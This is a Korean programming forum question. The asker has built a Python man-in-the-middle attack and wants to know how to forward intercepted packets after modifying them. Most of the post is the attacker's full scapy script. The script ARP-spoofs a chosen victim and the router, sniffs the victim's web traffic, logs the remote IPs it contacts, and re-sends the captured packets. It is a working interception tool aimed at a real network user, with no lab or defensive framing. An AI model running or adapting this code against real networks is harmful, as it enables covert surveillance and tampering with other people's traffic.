python 중간자 공격에 따른 패킷 포워딩 구현
조회수 2682회
현재 파이썬으로 중간자 공격을 해보려고 합니다
중간자 공격을 해서 패킷을 훔치는 것 까지는 성공했는데 받은 패킷을 원래의 주소로 넘겨주는 방법을 잘 모르겠습니다
물론 운영체제에서 지원하는 기능을 사용하면 된다는것은 알고있습니다 (예 sudo sysctl -w net.inet.ip.forwarding=1) 그러나 운영체제의 도움을 받으면 패킷을 수정해서 보낼 수 없었습니다
저는 받은 패킷을 수정해서 보내주고 싶습니다 어떻게 하면 구현할 수 있을 까요?
혹시 도움이 되시라고 소스코드도 올리도록 하겠습니다
import subprocess
import os
import scapy.all
import time
import sys
import threading
victim_ip='0'
ips=[]
def select_victim():
victim_ip=raw_input('Input victim IP')
router_ip=raw_input('Input router IP')
return (victim_ip, router_ip)
def getMac(host):
a=subprocess.Popen(["arp", "-a"], stdout=subprocess.PIPE)
a=a.stdout.read().split('\n')[:-1]
for i in a:
tmp=i.split(' ')
if host in tmp[1]:
return tmp[3]
def attack(victim_ip, router_ip):
victim_mac=getMac(victim_ip)
router_mac=getMac(router_ip)
scapy.all.send(scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=victim_mac))
scapy.all.send(scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=router_mac))
def recover(victim_ip, router_ip):
victim_mac=getMac(victim_ip)
router_mac=getMac(router_ip)
scapy.all.send(scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victim_mac), count=3)
scapy.all.send(scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=router_mac), count=3)
def pr(x):
try:
global victim_ip
global ips
print victim_ip
with open('test.txt', 'at') as f:
if x.haslayer(scapy.all.TCP):
if x['TCP'].sport == 80 or x['TCP'].dport == 80 or x['TCP'].sport == 443 or x['TCP'].dport == 443:
if x['IP'].src == victim_ip and not(str(x['IP'].dst) in ips):
f.write(str(x['IP'].dst)+' ')
ips.append(str(x['IP'].dst))
elif x['IP'].dst == victim_ip and not (str(x['IP'].src) in ips):
f.write(str(x['IP'].src)+' ')
ips.append(str(x['IP'].src))
x.show()
scapy.all.sendp(x, iface='en0')
except Exception, err:
print err
pass
def sniffing():
scapy.all.sniff(prn=pr)
def main():
#if os.geteuid() != 0:
# sys.exit("[!] Please run as root")
IP=select_victim()
global victim_ip
victim_ip=IP[0]
router_ip=IP[1]
if getMac(router_ip) == None:
print 'We can not find router mac address'
return
if getMac(victim_ip) == None:
print 'we can not find victim mac address'
return
t=threading.Thread(target=sniffing)
t.start()
try:
while True:
print 'a'
attack(victim_ip, router_ip)
time.sleep(2)
except Exception, err:
print err
recover(victim_ip, router_ip)
t.join(10)
exit()
if __name__ == '__main__':
with open('test.txt', 'rt') as f:
ips=f.read().split(' ')
main()
댓글 입력